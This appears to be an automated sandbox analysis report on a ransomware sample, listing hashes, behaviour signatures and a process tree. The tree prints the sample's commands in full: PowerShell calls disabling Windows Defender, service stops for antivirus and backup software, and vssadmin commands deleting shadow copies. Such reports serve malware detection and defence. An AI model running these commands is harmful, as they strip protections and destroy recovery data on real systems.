Analysis
-
max time kernel
138s -
max time network
131s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
26-07-2021 12:58
Static task
static1
Behavioral task
behavioral1
Sample
81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Resource
win10v20210410
General
-
Target
81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
-
Size
416KB
-
MD5
21fa6ebdd397f14bbb68a4e3d012467e
-
SHA1
0ecff2f818565e7eb28d3a7b7d295459a868e920
-
SHA256
81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e
-
SHA512
368e0c8e973f2cf655ea8a69be07b29bc073b2855f6feb9130f5fa8569cfa8d094549ec5d7706c293f8b22ae8bb6ee1b7dd2f4c2d2ccff94e7435e36d966bf66
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\UpdateComplete.png.builder 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4928 vssadmin.exe 4524 vssadmin.exe 3820 vssadmin.exe 4884 vssadmin.exe 3980 vssadmin.exe 2212 vssadmin.exe 4576 vssadmin.exe 2948 vssadmin.exe 3264 vssadmin.exe 4428 vssadmin.exe 3664 vssadmin.exe 2832 vssadmin.exe 4852 vssadmin.exe 3096 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 4128 taskkill.exe 4648 taskkill.exe 4764 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 3080 powershell.exe 3732 powershell.exe 1908 powershell.exe 3080 powershell.exe 3876 powershell.exe 3876 powershell.exe 1928 powershell.exe 1928 powershell.exe 192 powershell.exe 192 powershell.exe 2688 powershell.exe 2688 powershell.exe 3732 powershell.exe 3732 powershell.exe 3080 powershell.exe 3080 powershell.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 4164 powershell.exe 4164 powershell.exe 2788 powershell.exe 2788 powershell.exe 4280 powershell.exe 4280 powershell.exe 4424 powershell.exe 4424 powershell.exe 1908 powershell.exe 1908 powershell.exe 3876 powershell.exe 3876 powershell.exe 3732 powershell.exe 4548 powershell.exe 4548 powershell.exe 1928 powershell.exe 1928 powershell.exe 192 powershell.exe 192 powershell.exe 2788 powershell.exe 2688 powershell.exe 1908 powershell.exe 4164 powershell.exe 3876 powershell.exe 4280 powershell.exe 4424 powershell.exe 1928 powershell.exe 4548 powershell.exe 192 powershell.exe 2788 powershell.exe 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1432 powershell.exe Token: SeIncreaseQuotaPrivilege 1432 powershell.exe Token: SeSecurityPrivilege 1432 powershell.exe Token: SeTakeOwnershipPrivilege 1432 powershell.exe Token: SeLoadDriverPrivilege 1432 powershell.exe Token: SeSystemProfilePrivilege 1432 powershell.exe Token: SeSystemtimePrivilege 1432 powershell.exe Token: SeProfSingleProcessPrivilege 1432 powershell.exe Token: SeIncBasePriorityPrivilege 1432 powershell.exe Token: SeCreatePagefilePrivilege 1432 powershell.exe Token: SeBackupPrivilege 1432 powershell.exe Token: SeRestorePrivilege 1432 powershell.exe Token: SeShutdownPrivilege 1432 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeSystemEnvironmentPrivilege 1432 powershell.exe Token: SeRemoteShutdownPrivilege 1432 powershell.exe Token: SeUndockPrivilege 1432 powershell.exe Token: SeManageVolumePrivilege 1432 powershell.exe Token: 33 1432 powershell.exe Token: 34 1432 powershell.exe Token: 35 1432 powershell.exe Token: 36 1432 powershell.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 192 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeIncreaseQuotaPrivilege 3080 powershell.exe Token: SeSecurityPrivilege 3080 powershell.exe Token: SeTakeOwnershipPrivilege 3080 powershell.exe Token: SeLoadDriverPrivilege 3080 powershell.exe Token: SeSystemProfilePrivilege 3080 powershell.exe Token: SeSystemtimePrivilege 3080 powershell.exe Token: SeProfSingleProcessPrivilege 3080 powershell.exe Token: SeIncBasePriorityPrivilege 3080 powershell.exe Token: SeCreatePagefilePrivilege 3080 powershell.exe Token: SeBackupPrivilege 3080 powershell.exe Token: SeRestorePrivilege 3080 powershell.exe Token: SeShutdownPrivilege 3080 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeSystemEnvironmentPrivilege 3080 powershell.exe Token: SeRemoteShutdownPrivilege 3080 powershell.exe Token: SeUndockPrivilege 3080 powershell.exe Token: SeManageVolumePrivilege 3080 powershell.exe Token: 33 3080 powershell.exe Token: 34 3080 powershell.exe Token: 35 3080 powershell.exe Token: 36 3080 powershell.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeIncreaseQuotaPrivilege 3732 powershell.exe Token: SeSecurityPrivilege 3732 powershell.exe Token: SeTakeOwnershipPrivilege 3732 powershell.exe Token: SeLoadDriverPrivilege 3732 powershell.exe Token: SeSystemProfilePrivilege 3732 powershell.exe Token: SeSystemtimePrivilege 3732 powershell.exe Token: SeProfSingleProcessPrivilege 3732 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2264 wrote to memory of 1432 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 74 PID 2264 wrote to memory of 1432 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 74 PID 2264 wrote to memory of 3732 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 79 PID 2264 wrote to memory of 3732 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 79 PID 2264 wrote to memory of 3080 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 81 PID 2264 wrote to memory of 3080 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 81 PID 2264 wrote to memory of 1908 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 83 PID 2264 wrote to memory of 1908 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 83 PID 2264 wrote to memory of 3876 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 85 PID 2264 wrote to memory of 3876 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 85 PID 2264 wrote to memory of 1928 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 87 PID 2264 wrote to memory of 1928 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 87 PID 2264 wrote to memory of 192 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 89 PID 2264 wrote to memory of 192 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 89 PID 2264 wrote to memory of 2688 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 91 PID 2264 wrote to memory of 2688 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 91 PID 2264 wrote to memory of 2788 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 93 PID 2264 wrote to memory of 2788 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 93 PID 2264 wrote to memory of 4164 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 95 PID 2264 wrote to memory of 4164 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 95 PID 2264 wrote to memory of 4280 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 97 PID 2264 wrote to memory of 4280 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 97 PID 2264 wrote to memory of 4424 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 99 PID 2264 wrote to memory of 4424 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 99 PID 2264 wrote to memory of 4548 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 101 PID 2264 wrote to memory of 4548 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 101 PID 2264 wrote to memory of 4680 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 103 PID 2264 wrote to memory of 4680 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 103 PID 4680 wrote to memory of 4972 4680 net.exe 105 PID 4680 wrote to memory of 4972 4680 net.exe 105 PID 2264 wrote to memory of 4956 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 106 PID 2264 wrote to memory of 4956 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 106 PID 4956 wrote to memory of 4608 4956 net.exe 128 PID 4956 wrote to memory of 4608 4956 net.exe 128 PID 2264 wrote to memory of 4744 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 109 PID 2264 wrote to memory of 4744 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 109 PID 4744 wrote to memory of 4696 4744 net.exe 140 PID 4744 wrote to memory of 4696 4744 net.exe 140 PID 2264 wrote to memory of 4184 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 112 PID 2264 wrote to memory of 4184 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 112 PID 4184 wrote to memory of 1608 4184 net.exe 114 PID 4184 wrote to memory of 1608 4184 net.exe 114 PID 2264 wrote to memory of 4392 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 115 PID 2264 wrote to memory of 4392 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 115 PID 4392 wrote to memory of 3336 4392 net.exe 117 PID 4392 wrote to memory of 3336 4392 net.exe 117 PID 2264 wrote to memory of 692 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 118 PID 2264 wrote to memory of 692 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 118 PID 2264 wrote to memory of 2960 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 120 PID 2264 wrote to memory of 2960 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 120 PID 2264 wrote to memory of 3332 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 122 PID 2264 wrote to memory of 3332 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 122 PID 2264 wrote to memory of 3920 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 124 PID 2264 wrote to memory of 3920 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 124 PID 2264 wrote to memory of 4128 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 126 PID 2264 wrote to memory of 4128 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 126 PID 2264 wrote to memory of 4648 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 129 PID 2264 wrote to memory of 4648 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 129 PID 2264 wrote to memory of 4764 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 131 PID 2264 wrote to memory of 4764 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 131 PID 2264 wrote to memory of 3820 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 133 PID 2264 wrote to memory of 3820 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 133 PID 2264 wrote to memory of 4576 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 137 PID 2264 wrote to memory of 4576 2264 81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe"C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4972
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4608
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4696
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:1608
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3336
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:692
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:2960
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3332
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3920
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4648
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:4764
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3820
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4576
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4696
-
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3664
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4928
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3980
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2832
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4852
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2948
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2212
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4524
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3096
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3264
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4428
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4608
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5116